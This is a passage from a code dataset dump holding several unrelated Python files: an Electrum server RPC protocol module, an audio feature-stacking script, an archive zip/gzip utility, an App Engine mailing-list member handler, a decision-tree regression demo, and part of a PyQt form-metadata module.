hashes[n + 1])\n for n in range(0, len(hashes), 2)]\n\n return {\"block_height\": height, \"merkle\": merkle_branch, \"pos\": pos}\n\n def get_history(self, hash168):\n # Note history is ordered and mempool unordered in electrum-server\n # For mempool, height is -1 if unconfirmed txins, otherwise 0\n history = self.bp.get_history(hash168, limit=None)\n mempool = self.bp.mempool_transactions(hash168)\n\n conf = tuple({'tx_hash': hash_to_str(tx_hash), 'height': height}\n for tx_hash, height in history)\n unconf = tuple({'tx_hash': tx_hash, 'height': -unconfirmed, 'fee': fee}\n for tx_hash, fee, unconfirmed in mempool)\n return conf + unconf\n\n def get_chunk(self, index):\n '''Return header chunk as hex. Index is a non-negative integer.'''\n chunk_size = self.coin.CHUNK_SIZE\n next_height = self.height() + 1\n start_height = min(index * chunk_size, next_height)\n count = min(next_height - start_height, chunk_size)\n return self.bp.read_headers(start_height, count).hex()\n\n def get_balance(self, hash168):\n confirmed = self.bp.get_balance(hash168)\n unconfirmed = self.bp.mempool_value(hash168)\n return {'confirmed': confirmed, 'unconfirmed': unconfirmed}\n\n def list_unspent(self, hash168):\n utxos = self.bp.get_utxos_sorted(hash168)\n return tuple({'tx_hash': hash_to_str(utxo.tx_hash),\n 'tx_pos': utxo.tx_pos, 'height': utxo.height,\n 'value': utxo.value}\n for utxo in utxos)\n\n # --- blockchain commands\n\n async def address_get_balance(self, params):\n hash168 = self.extract_hash168(params)\n return self.get_balance(hash168)\n\n async def address_get_history(self, params):\n hash168 = self.extract_hash168(params)\n return self.get_history(hash168)\n\n async def address_get_mempool(self, params):\n hash168 = self.extract_hash168(params)\n raise RPCError('get_mempool is not yet implemented')\n\n async def address_get_proof(self, params):\n hash168 = self.extract_hash168(params)\n raise RPCError('get_proof is not yet implemented')\n\n async def address_listunspent(self, params):\n hash168 = self.extract_hash168(params)\n return self.list_unspent(hash168)\n\n async def address_subscribe(self, params):\n hash168 = self.extract_hash168(params)\n self.hash168s.add(hash168)\n return self.address_status(hash168)\n\n async def block_get_chunk(self, params):\n index = self.extract_non_negative_integer(params)\n return self.get_chunk(index)\n\n async def block_get_header(self, params):\n height = self.extract_non_negative_integer(params)\n return self.electrum_header(height)\n\n async def estimatefee(self, params):\n return await self.daemon.estimatefee(params)\n\n async def headers_subscribe(self, params):\n self.require_empty_params(params)\n self.subscribe_headers = True\n return self.current_electrum_header()\n\n async def numblocks_subscribe(self, params):\n self.require_empty_params(params)\n self.subscribe_height = True\n return self.height()\n\n async def relayfee(self, params):\n '''The minimum fee a low-priority tx must pay in order to be accepted\n to the daemon's memory pool.'''\n self.require_empty_params(params)\n return await self.daemon.relayfee()\n\n async def transaction_broadcast(self, params):\n '''Pass through the parameters to the daemon.\n\n An ugly API: current Electrum clients only pass the raw\n transaction in hex and expect error messages to be returned in\n the result field. 
And the server shouldn't be doing the client's\n user interface job here.\n '''\n try:\n tx_hash = await self.daemon.sendrawtransaction(params)\n self.logger.info('sent tx: {}'.format(tx_hash))\n return tx_hash\n except DaemonError as e:\n error = e.args[0]\n message = error['message']\n self.logger.info('sendrawtransaction: {}'.format(message))\n if 'non-mandatory-script-verify-flag' in message:\n return (\n 'Your client produced a transaction that is not accepted '\n 'by the network any more. Please upgrade to Electrum '\n '2.5.1 or newer.'\n )\n\n return (\n 'The transaction was rejected by network rules. ({})\\n[{}]'\n .format(message, params[0])\n )\n\n async def transaction_get(self, params):\n '''Return the serialized raw transaction.'''\n # For some reason Electrum passes a height. Don't require it\n # in anticipation it might be dropped in the future.\n if 1 <= len(params) <= 2:\n tx_hash = self.tx_hash_from_param(params[0])\n return await self.daemon.getrawtransaction(tx_hash)\n\n raise RPCError('params wrong length: {}'.format(params))\n\n async def transaction_get_merkle(self, params):\n if len(params) == 2:\n tx_hash = self.tx_hash_from_param(params[0])\n height = self.non_negative_integer_from_param(params[1])\n return await self.tx_merkle(tx_hash, height)\n\n raise RPCError('params should contain a transaction hash and height')\n\n async def utxo_get_address(self, params):\n if len(params) == 2:\n tx_hash = self.tx_hash_from_param(params[0])\n index = self.non_negative_integer_from_param(params[1])\n tx_hash = hex_str_to_hash(tx_hash)\n hash168 = self.bp.get_utxo_hash168(tx_hash, index)\n if hash168:\n return self.coin.hash168_to_address(hash168)\n return None\n\n raise RPCError('params should contain a transaction hash and index')\n\n # --- server commands\n\n async def banner(self, params):\n '''Return the server banner.'''\n self.require_empty_params(params)\n banner = 'Welcome to Electrum!'\n if self.env.banner_file:\n try:\n with codecs.open(self.env.banner_file, 'r', 'utf-8') as f:\n banner = f.read()\n except Exception as e:\n self.logger.error('reading banner file {}: {}'\n .format(self.env.banner_file, e))\n return banner\n\n async def donation_address(self, params):\n '''Return the donation address as a string.\n\n If none is specified return the empty string.\n '''\n self.require_empty_params(params)\n return self.env.donation_address\n\n async def peers_subscribe(self, params):\n '''Returns the peer (ip, host, ports) tuples.\n\n Despite the name electrum-server does not treat this as a\n subscription.\n '''\n self.require_empty_params(params)\n return list(self.manager.irc_peers().values())\n\n async def version(self, params):\n '''Return the server version as a string.'''\n if len(params) == 2:\n self.client = str(params[0])\n self.protocol_version = params[1]\n return VERSION\n\n\nclass LocalRPC(Session):\n '''A local TCP RPC server for querying status.'''\n\n def __init__(self, *args):\n super().__init__(*args)\n cmds = 'getinfo sessions numsessions peers numpeers'.split()\n self.handlers = {cmd: getattr(self, cmd) for cmd in cmds}\n\n async def getinfo(self, params):\n return self.manager.info()\n\n async def sessions(self, params):\n return self.manager.sessions_info()\n\n async def numsessions(self, params):\n return self.manager.session_count()\n\n async def peers(self, params):\n return self.manager.irc_peers()\n\n async def numpeers(self, params):\n return 
len(self.manager.irc_peers())\n","sub_path":"server/protocol.py","file_name":"protocol.py","file_ext":"py","file_size_in_byte":21809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"330926195","text":"from Util import *\nimport soundfile as sf\nfrom sklearn.mixture import BayesianGaussianMixture, GaussianMixture\nimport numpy as np\n\n'''\n****************\nFor testing we read the features extracted\nfor testing from the Features2 folder instead of the\nFeatures folder, and save the feature stack under\nthe name featurelist2 instead of featurelist\n****************\n'''\n\n'''\n****************\nChanging the name to Features2\n****************\n'''\nFeatureFiles = ListAllFiles(\"/home/srinath/Desktop/SpeakerRecognition/Features2\", Extention = \"npy\")\n# print(len(FeatureFiles))\nstack = loadnp(FeatureFiles[0])[1:13, :].transpose()\nprint(\"done0\")\n# print(stack.shape)\nFeatureFiles.remove(FeatureFiles[0])\nlenFeatureFiles = len(FeatureFiles)\nfor x in range(lenFeatureFiles) :\n    feature = loadnp(FeatureFiles[x]).transpose()\n    stack = np.concatenate((stack, feature[:, 1:13]),)\n    # print(stack.shape)\n    print(\"done\"+ str(x+1))\nprint(stack.shape)\n\n\n'''\n****************\nSaving the feature stack under the name\nfeaturelist2\n****************\n'''\nsavenp( arr = stack, filename = \"/home/srinath/Desktop/SpeakerRecognition/FeatureStack/featurelist2\")\n","sub_path":"Python Files/ubm_feature_stacking.py","file_name":"ubm_feature_stacking.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
{"seq_id":"22080690","text":"import zipfile\nimport gzip\nimport os\nimport tarfile\nimport shutil\nfrom io import BytesIO\nimport abc\n\n\ndef zipped(filename, *args, **kwargs):\n    method = os.path.splitext(filename)[1][1:]\n    if method == \"zip\":\n        return Zip().zip(filename, *args, **kwargs)\n    else:\n        return Gzip().zip(filename, *args, **kwargs)\n\n\ndef unzipped(filename, *args, **kwargs):\n    method = os.path.splitext(filename)[1][1:]\n    if method == \"zip\":\n        return Zip().unzip(filename, *args, **kwargs)\n    else:\n        return Gzip().unzip(filename, *args, **kwargs)\n\n\nclass BaseZipper(object):\n    __metaclass__ = abc.ABCMeta\n    _comp = None\n\n    @abc.abstractmethod\n    def zip(self, *args, **kwargs):\n        pass\n\n    @abc.abstractmethod\n    def unzip(self, *args, **kwargs):\n        pass\n\n\nclass Zip(BaseZipper):\n    _comp = zipfile.PyZipFile\n\n    def zip(self, zip_name, *paths, mode=\"w\"):\n        zip_name = os.path.splitext(zip_name)[0] + \".zip\"\n        zf = self._comp(zip_name, mode)\n        for path in paths:\n            if os.path.isdir(path):\n                for root, dirs, files in os.walk(path):\n                    for file in files:\n                        zf.write(os.path.join(root, file))\n            else:\n                zf.write(path)\n\n    def unzip(self, zip_name, mode=\"r\"):\n        zf = self._comp(zip_name, mode)\n        for name in zf.namelist():\n            # create the member's directory part before writing (was splitext(name)[1], which named a directory after the file extension)\n            dir_path = os.path.split(name)[0]\n            if len(dir_path) > 0 and not os.path.exists(dir_path):\n                os.mkdir(dir_path)\n\n            with open(name, \"wb\") as file:\n                file.write(zf.read(name))\n\n\nclass Gzip(BaseZipper):\n\n    _comp = gzip.GzipFile\n\n    def zip(self, zip_name, *paths, mode=\"w\"):\n        if len(paths) > 1:\n            zip_name = os.path.splitext(zip_name)[0] + \".tar\"\n            self._tarball(zip_name, *paths)\n        elif len(paths) == 1:\n            if os.path.splitext(zip_name)[1] != \".gz\":\n                zip_name += \".gz\"\n            self._gzip(zip_name, paths[0])\n\n    def unzip(self, zip_name):\n        with gzip.open(zip_name, \"rb\") as gzfile:\n            # strip the \".gz\" suffix to recover the original name\n            output_name = os.path.splitext(zip_name)[0]\n            if 
os.path.splitext(output_name)[1] == \".tar\":\n                # open the in-memory tar for reading (the original passed \"w\" positionally, which tarfile.open takes as the file *name*)\n                with tarfile.open(mode=\"r\", fileobj=BytesIO(gzfile.read())) as output_file:\n                    output_file.extractall()\n            else:\n                with open(output_name, \"wb\") as output:\n                    output.write(gzfile.read())\n\n    def _tarball(self, zip_name, *paths):\n        # write a plain tar here; _gzip below adds the gzip layer (\"w:gz\" would have compressed twice)\n        with tarfile.open(zip_name, \"w\") as tar:\n            for path in paths:\n                tar.add(path, arcname=os.path.basename(path))\n\n        self._gzip(zip_name+\".gz\", zip_name)\n\n        os.remove(zip_name)\n\n    @staticmethod\n    def _gzip(zip_name, file_name):\n        with open(file_name, 'rb') as f_in:\n            with gzip.open(zip_name, 'wb') as f_out:\n                shutil.copyfileobj(f_in, f_out)\n\n\n","sub_path":"apogee/utils/processing/zipping.py","file_name":"zipping.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"608410586","text":"import json\nimport os\nimport re\nfrom app.authentication import BaseRequestHandler\nfrom app.mail_helper import send_mail\nfrom app.model.list_model import List, get_list_by_id\nimport logging\nfrom app.model.member import get_member_and_list_by_member_id\nfrom google.appengine.ext.webapp import template\n\n__author__ = 'simonhutton'\n\n\nclass ManageMembers(BaseRequestHandler):\n    def post(self):\n        json_request = json.loads(self.request.body)\n\n        address = json_request['email'].lower()\n        name = json_request['name']\n        parent_list_id = json_request['parentListId']\n        send_welcome = json_request['sendWelcome']\n\n        user = self.current_user\n\n        response = {}\n\n        if user:\n            found_list = get_list_by_id(parent_list_id)\n\n            if found_list:\n                if found_list.is_admin(self.current_user):\n                    if len(found_list.members) < found_list.max_members:\n                        new_member = found_list.add_member_to_list(address, name)\n\n                        if send_welcome:\n                            send_add_member_email(found_list, new_member)\n\n                        response = new_member.to_dict()\n                        self.response.status = 200\n                    else:\n                        response['message'] = \"Too many members. Max. 
\" + str(found_list.max_members) + \".\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n else:\n response['message'] = \"You need to be an administrator add members.\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'] + \" (\" + parent_list_id + \")\")\n self.response.status = 401\n\n self.response.out.write(json.dumps(response))\n\n def delete(self):\n response = {}\n\n matches = re.match(\n r\"/list/members/(?P.*)\",\n self.request.path)\n\n if matches:\n member_id = matches.group(\"member_id\")\n\n user = self.current_user\n\n if user:\n member, found_list = get_member_and_list_by_member_id(member_id)\n\n if found_list:\n if found_list.is_admin(self.current_user):\n found_list.members.remove(member.key)\n\n found_list.put()\n\n member.key.delete()\n\n self.response.status = 200\n else:\n response['message'] = \"You need to be an administrator remove members.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'])\n self.response.status = 401\n else:\n response['message'] = 'Could not parse path ' + self.request.path\n logging.error(response['message'])\n self.response.status = 500\n\n self.response.out.write(json.dumps(response))\n\n def put(self):\n response = {}\n\n matches = re.match(\n r\"/list/members/(?P.*)\",\n self.request.path)\n\n json_request = json.loads(self.request.body)\n\n name = json_request['name']\n\n if matches:\n member_id = matches.group(\"member_id\")\n\n user = self.current_user\n\n if user:\n member, found_list = get_member_and_list_by_member_id(member_id)\n\n if found_list:\n if found_list.is_admin(self.current_user):\n member.name = name\n\n member.put()\n\n response = member.to_dict()\n\n self.response.status = 200\n else:\n response['message'] = \"You need to be an administrator remove members.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 401\n else:\n response['message'] = \"Couldn't find list.\"\n logging.error(response['message'] + \" (\" + found_list.name + \")\")\n self.response.status = 404\n else:\n response['message'] = 'You need to be logged in to add members.'\n logging.error(response['message'])\n self.response.status = 401\n else:\n response['message'] = 'Could not parse path ' + self.request.path\n logging.error(response['message'])\n self.response.status = 500\n\n self.response.out.write(json.dumps(response))\n\n\ndef send_add_member_email(found_list, member):\n template_values = {'member': member,\n 'list': found_list,\n 'owner_email': found_list.get_admin_email(),\n 'owner_name': found_list.get_admin_name()}\n\n path = os.path.join(os.path.join(os.path.dirname(__file__), 'html'), '../../templates/mail/add_member.txt')\n rendered_mail = template.render(path, template_values)\n\n send_mail(member.name, member.email, \"Gaggle Mail\", \"help@gaggle-mail.com\", \"[\" + found_list.name + \"] Welcome to the mailing list\", 
rendered_mail, None)\n\n","sub_path":"app/manage_members.py","file_name":"manage_members.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"413356363","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeRegressor\nimport matplotlib.pyplot as plt\n\nN = 100\nX = np.random.rand(N)*6 - 3\nX.sort()\n\ny = np.sin(X) + np.random.rand(N) * 0.05\n#print(y)\n#print(X)\nX = X.reshape(-1,1) # reshape the 1-D array into an (N, 1) matrix\n#print(X)\n\ndt_reg = DecisionTreeRegressor(criterion='mse', max_depth=3)\ndt_reg.fit(X, y)\n\nX_test = np.linspace(-3,3,50).reshape(-1,1)\ny_hat = dt_reg.predict(X_test)\n\nplt.plot(X, y, 'y*', label='actual')\nplt.plot(X_test, y_hat, 'b-', linewidth=2, label='predict')\nplt.legend(loc = 'upper left')\nplt.grid()\nplt.show()\n\n# use a for loop to compare the fit and predictions of trees with different depths\ndepth = [2, 4, 6, 8, 10]\ncolors = 'rgbmy'\ndt_reg_0 = DecisionTreeRegressor()\nplt.plot(X, y, 'ko', label='actual')\nfor d, c in zip(depth, colors): # zip() iterates the two sequences in parallel\n    dt_reg_0.set_params(max_depth=d)\n    dt_reg_0.fit(X, y)\n    y_hat_0 = dt_reg_0.predict(X_test)\n    plt.plot(X_test, y_hat_0, '-', color=c, linewidth=2, label=\"depth=%d\"%d)\nplt.legend(loc='upper left')\nplt.grid(b=True)\nplt.show()\n","sub_path":"decision_tree/decision_tree_regression01.py","file_name":"decision_tree_regression01.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"}
{"seq_id":"350618021","text":"#coding=utf-8\n# ycat\t\t\t2017-09-05\t create\n# UI metadata manager \nimport sys,os\nimport uuid\nimport collections\nimport qtawesome as qta\t\nimport PyQt5\nfrom PyQt5.QtCore import Qt,QEvent,QPoint\nfrom PyQt5.QtGui import QPalette,QColor\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QHBoxLayout,QLayout, QLineEdit,QVBoxLayout,QFormLayout,QLabel,QCheckBox,QComboBox,\n\t\tQSizePolicy,QTableView, QToolButton, QWidget,QTextEdit,QDialog,QPushButton,QHeaderView,QAbstractItemView)\nfrom PyQt5.QtGui import (QStandardItemModel,QStandardItem)\nimport setup\nif __name__ == '__main__':\n\tsetup.setCurPath(__file__)\nimport log\nimport ui.inputBox\nimport ui.numberBox\nimport ui.checkbox\nimport qtutility\nimport utility\nimport enhance\nimport json_codec as json\nDEFAULT_CODEC = \"utf-8\"\t\t\n\ng_modified_marker = \"*\"\n\ndef _setModified(label):\n\tt = label.text()\n\tif len(t) <= len(g_modified_marker) or t[0:len(g_modified_marker)] != g_modified_marker:\n\t\tlabel.setText(g_modified_marker+label.text())\n\t\t\t\t\ndef _clearModified(label):\n\tt = label.text()\n\tif len(t) > len(g_modified_marker) and t[0:len(g_modified_marker)] == g_modified_marker:\n\t\tlabel.setText(label.text()[len(g_modified_marker):])\n\t\t \ndef scramble(s):\n\tif len(s):\n\t\treturn utility.md5(\"ycat\"+s) \n\telse:\n\t\treturn s\n\nclass pwdCtrl(PyQt5.QtWidgets.QLineEdit):\t \n\tdef __init__(self):\n\t\tsuper(pwdCtrl, self).__init__() \n\t\tself.setEchoMode(QLineEdit.Password)\n\t\n\t#QMouseEvent\n\tdef mousePressEvent(self,event):\n\t\tself.setText(\"\")\n\t\tsuper(pwdCtrl, self).mousePressEvent(event) \n\t\t\t\n\nclass metaItem:\n\t#name is the display name\n\t#fieldName is the English field name\n\t#ctrl is the concrete widget class used for editing\n\t#valueType is the data type \n\t#defaultValue is the default value\n\tdef __init__(self,name,fieldName,ctrl,valueType,defaultValue=None):\n\t\tself.name = name\n\t\tself.fieldName = fieldName\n\t\tself.ctrlClass = ctrl\n\t\tself.valueType = valueType \n\t\tself.readonly = False\n\t\tself._defaultValue = defaultValue\n\t\tself.tooltip = 
\"\"\n\t\tself.isCheckble=False\n\t\t#numberbox\n\t\tself.min = None\n\t\tself.max = None\n\t\t\n\t\t#select\n\t\tself.items = []\t\n\t\t\n\t\t#textBox\n\t\tself.maxSize = None\n\t\tself.minSize = None\n\t\t\n\t\t#float\n\t\tself.precision = None\n\t\t\n\t\t#password\n\t\tself.scrambleFunc = None\n\t\n\t\t\n\tdef saveData(self):\n\t\tr = {}\n\t\tr[\"name\"] = self.name\n\t\tr[\"fieldName\"] = self.fieldName\n\t\tr[\"ctrlClass\"] = enhance.typeName(self.ctrlClass)\n\t\tr[\"valueType\"] = self.valueType\n\t\tr[\"tooltip\"] = self.tooltip\n\t\tif self.isCheckble:\n\t\t\tr[\"isCheckble\"] = str(self.isCheckble)\n\t\tif self.readonly:\n\t\t\tr[\"readonly\"] = str(self.readonly)\n\t\tif self._defaultValue is not None:\n\t\t\tr[\"defaultValue\"] = str(self.defaultValue)\n\t\tif self.min is not None:\n\t\t\tr[\"min\"] = self.min\n\t\tif self.max is not None:\n\t\t\tr[\"max\"] = self.max\n\t\tif self.items:\n\t\t\tr[\"items\"] = self.items\n\t\tif self.maxSize is not None:\n\t\t\tr[\"maxSize\"] = self.maxSize\n\t\tif self.minSize is not None:\n\t\t\tr[\"minSize\"] = self.minSize\n\t\tif self.precision is not None:\n\t\t\tr[\"precision\"] = self.precision\n\t\tif self.scrambleFunc is not None:\n\t\t\tr[\"scrambleFunc\"] = enhance.typeName(self.scrambleFunc)\n\t\treturn r\n\t\n\t@staticmethod\n\tdef loadData(data):\n\t\tc = enhance.getType(data[\"ctrlClass\"])\n\t\tm = metaItem(name=data[\"name\"],fieldName=data[\"fieldName\"],ctrl=c,valueType=data[\"valueType\"],defaultValue=None)\n\t\tif \"tooltip\" in data:\n\t\t\tm.tooltip = data[\"tooltip\"]\n\t\tif \"readonly\" in data:\n\t\t\tm.readonly = bool(data[\"readonly\"])\n\t\tif \"defaultValue\" in data:\n\t\t\tm.defaultValue = m.value(data[\"defaultValue\"])\n\t\tif \"min\" in data:\n\t\t\tm.min = data[\"min\"]\n\t\tif \"max\" in data:\n\t\t\tm.max = data[\"max\"]\n\t\tif \"items\" in data:\n\t\t\tm.items = data[\"items\"]\n\t\tif \"maxSize\" in data:\n\t\t\tm.maxSize = data[\"maxSize\"]\t\t\n\t\tif \"minSize\" in data:\n\t\t\tm.maxSize = data[\"minSize\"]\t\n\t\tif \"precision\" in data:\n\t\t\tm.maxSize = data[\"precision\"]\t\n\t\tif \"scrambleFunc\" in data:\n\t\t\tm.scrambleFunc = enhance.getType(data[\"scrambleFunc\"])\n\t\tif \"isCheckble\" in data:\n\t\t\tm.isCheckble = bool(data[\"isCheckble\"])\n\t\treturn m \n\t\n\tdef addCtrl(self,formLayout,editable):\n\t\tif editable:\n\t\t\tc1 = self.getCtrl()\n\t\t\tlabel = self.getLabel(self.name,editable)\n\t\t\tformLayout.addRow(label,c1)\n\t\t\tif self.valueType == \"pwd\": #and newDlg:\n\t\t\t\tc2 = self.getCtrl()\n\t\t\t\tlabel2 = self.getLabel(self.name.strip()+\"确认\")\n\t\t\t\tformLayout.addRow(label2,c2)\n\t\t\t\treturn (c1,c2),(label.findChild(QLabel, 'mainLabel'),label2.findChild(QLabel, 'mainLabel')),(label.findChild(QCheckBox, 'mainCheckBox'),label2.findChild(QCheckBox, 'mainCheckBox'))\n\t\t\telse:\n\t\t\t\treturn c1,label.findChild(QLabel, 'mainLabel'),label.findChild(QCheckBox, 'mainCheckBox')\n\t\telse:\n\t\t\tc = QLineEdit()\n\t\t\tc.setReadOnly(True)\n\t\t\tif self.tooltip:\n\t\t\t\tc.setToolTip(self.tooltip)\n\t\t\tfont = c.font()\n\t\t\tfont.setPointSize(self.meta.fontSize)\n\t\t\tqtutility.setBackgroupColor(c,\"lightgray\")\n\t\t\tc.setFont(font) \n\t\t\tlabel = self.getLabel(self.name,editable)\n\t\t\tformLayout.addRow(label,c)\n\t\t\treturn c,label.findChild(QLabel, 'mainLabel'),label.findChild(QCheckBox, 'mainCheckBox')\n\t\n\tdef getLabel(self,text,editable=False):\n\t\tif not text.endswith(\":\"):\n\t\t\ttext = text +\":\"\n\t\tc = QLabel(text)\n\t\tfont = 
c.font()\n\t\tfont.setPointSize(self.meta.fontSize)\n\t\tc.setFont(font)\n\t\tif self.tooltip:\n\t\t\tc.setToolTip(self.tooltip)\n\t\tw= QWidget()\n\t\tl=QHBoxLayout()\n\t\tl.setContentsMargins(0,0,0,0)\n\t\tc.setObjectName('mainLabel')\n\t\tcb= QCheckBox()\n\t\tcb.setObjectName('mainCheckBox')\n\t\tcb.setEnabled(editable)\n\t\tif self.isCheckble:\n\t\t\tl.addWidget(cb)\n\t\tl.addWidget(c)\n\t\tw.setLayout(l)\n\t\treturn w\n\t\t\n\t@property\n\tdef defaultValue(self):\n\t\tif self._defaultValue is not None:\n\t\t\treturn self._defaultValue\n\t\tif self.valueType == \"int\" or self.valueType == \"float\":\n\t\t\treturn 0\n\t\tif self.valueType == \"bool\":\n\t\t\treturn False\n\t\treturn \"\"\n\t\n\t@defaultValue.setter\n\tdef defaultValue(self,v):\n\t\tself._defaultValue = v\n\t\n\tdef getCtrl(self):\n\t\tc = self.ctrlClass()\n\t\tfont = c.font()\n\t\tfont.setPointSize(self.meta.fontSize)\n\t\tc.setFont(font) \n\t\tif self.tooltip:\n\t\t\tc.setToolTip(self.tooltip)\n\t\tif self.valueType == \"int\":\n\t\t\tif self.min is not None:\n\t\t\t\tc.setMinimum(self.min)\n\t\t\telse:\n\t\t\t\tc.setMinimum(-9999)\n\t\t\tif self.max is not None:\n\t\t\t\tc.setMaximum(self.max)\n\t\t\telse:\n\t\t\t\tc.setMaximum(9999)\n\t\telif self.valueType == \"float\":\n\t\t\tif self.min is not None:\n\t\t\t\tc.setMinimum(self.min)\n\t\t\telse:\n\t\t\t\tc.setMinimum(-9999)\n\t\t\tif self.max is not None:\n\t\t\t\tc.setMaximum(self.max)\n\t\t\telse:\n\t\t\t\tc.setMaximum(9999)\n\t\t\tif self.precision is not None:\n\t\t\t\tc.setDecimals(self.precision)\n\t\telif self.valueType == \"select\" or self.valueType == \"bool\":\n\t\t\tfor i in self.items:\n\t\t\t\tc.addItem(i[1],i[0])\n\t\telif self.valueType == \"str\":\n\t\t\t# c.setReadOnly(self.readonly)\n\t\t\tif self.maxSize:\n\t\t\t\tc.setMaxLength(self.maxSize)\n\t\tc.setEnabled(not self.readonly)\n\t\treturn c\n\t \n\tdef value(self,obj):\n\t\t#if obj == \"None\":\n\t\t#\treturn None\n\t\tif isinstance(obj,QWidget):\n\t\t\tv = qtutility.getValue(obj)\n\t\telse:\n\t\t\tv = utility.get_attr(obj,self.fieldName)\n\t\tif v is None:\n\t\t\tv = self.defaultValue\n\t\tif self.valueType == \"int\":\n\t\t\tif v == \"\":\n\t\t\t\treturn self.defaultValue\n\t\t\treturn int(v)\n\t\telif self.valueType == \"float\":\n\t\t\tif v == \"\":\n\t\t\t\treturn self.defaultValue\n\t\t\treturn float(v)\n\t\telif self.valueType == \"bool\":\n\t\t\treturn bool(v)\n\t\telif self.valueType == \"pwd\":\n\t\t\tif len(v) < 15:\n\t\t\t\t#still the raw password, so scramble it \n\t\t\t\treturn self.scrambleFunc(v)\n\t\t\telse:\n\t\t\t\treturn v\n\t\telse:\n\t\t\treturn v\n\t\t\t\n\tdef valueStr(self,obj):\n\t\tv = self.value(obj)\n\t\tif self.valueType == \"float\": \n\t\t\tp = 2\n\t\t\tif self.precision is not None:\n\t\t\t\tp = self.precision\n\t\t\treturn (\"%0.\"+str(p)+\"f\")%v\n\t\telif self.valueType == \"pwd\":\n\t\t\treturn \"●\"*len(v)\n\t\telif self.valueType == \"select\" or self.valueType == \"bool\":\n\t\t\tfor i in self.items:\n\t\t\t\tif i[0] == v:\n\t\t\t\t\treturn str(i[1])\n\t\treturn str(v)\n\t\n\tdef setValue(self,obj,v):\n\t\tutility.set_attr(obj,self.fieldName,v)\n\t\t\n\tdef check(self,ctrls):\n\t\tif self.valueType == \"pwd\":\n\t\t\tif isinstance(ctrls,tuple):\n\t\t\t\tif qtutility.getValue(ctrls[0]) != qtutility.getValue(ctrls[1]):\n\t\t\t\t\treturn self.name+\"不相同\"\n\t\tif self.valueType == \"str\" or self.valueType == \"pwd\":\n\t\t\tif isinstance(ctrls,tuple):\n\t\t\t\tv = qtutility.getValue(ctrls[0])\n\t\t\telse:\n\t\t\t\tv = qtutility.getValue(ctrls)\n\t\t\tif v == \"\":\n\t\t\t\treturn 
self.name+\"不能为空\"\n\t\treturn None\t\n\t\n\t\t\t\nclass metaData: \n\tdef __init__(self,objType,title,iconName=\"\"):\n\t\tif isinstance(objType,str):\n\t\t\tobjType = enhance.getType(objType)\n\t\tself.objType = objType\n\t\tself.fields = collections.OrderedDict()\n\t\tself.title = title\n\t\tself.iconName = iconName\n\t\tself.primaryKeys = set()\n\t\tself.fontSize = 10\n\t\tself.attributes = {}\t#特殊的属性,比如对话框的大小等 \n\t\n\tdef setPrimary(self,name,*param):\n\t\tself.primaryKeys.clear()\n\t\tself.primaryKeys.add(name)\n\t\tassert name in self.fields\n\t\tfor p in param:\n\t\t\tassert p in self.fields\n\t\t\tself.primaryKeys.add(p)\n\t\n\tdef _getPrimary(self,obj):\n\t\tr = \"\"\n\t\tfor k in self.primaryKeys:\n\t\t\tv = self.fields[k].value(obj)\n\t\t\tr += str(v) + \"@@\"\n\t\treturn r\n\t \n\tdef addText(self,name,fieldName,ctrl=PyQt5.QtWidgets.QLineEdit,\n\t\t\t\t\treadonly=False,isCheckble=False,maxSize=None):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"str\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.maxSize = maxSize\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\n\tdef addPwd(self,name,fieldName,ctrl=pwdCtrl,scrambleFunc = scramble):\n\t\timport ui.meta\n\t\tif ctrl == pwdCtrl:\n\t\t\tctrl = ui.meta.pwdCtrl\n\t\tif scrambleFunc == scramble:\n\t\t\tscrambleFunc = ui.meta.scramble\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"pwd\")\n\t\tm.scrambleFunc = scrambleFunc\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addInt(self,name,fieldName,ctrl=PyQt5.QtWidgets.QSpinBox,min = None, max = None,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"int\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.min = min\n\t\tm.max = max\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addBool(self,name,fieldName,falseText=\"\",trueText=\"\",readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tctrl = PyQt5.QtWidgets.QComboBox\n\t\tm = metaItem(name,fieldName,ctrl,\"bool\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.items = [(False,falseText),(True,trueText)]\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\tdef addFloat(self,name,fieldName,precision=2,ctrl=PyQt5.QtWidgets.QDoubleSpinBox,min = None, max = None,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = 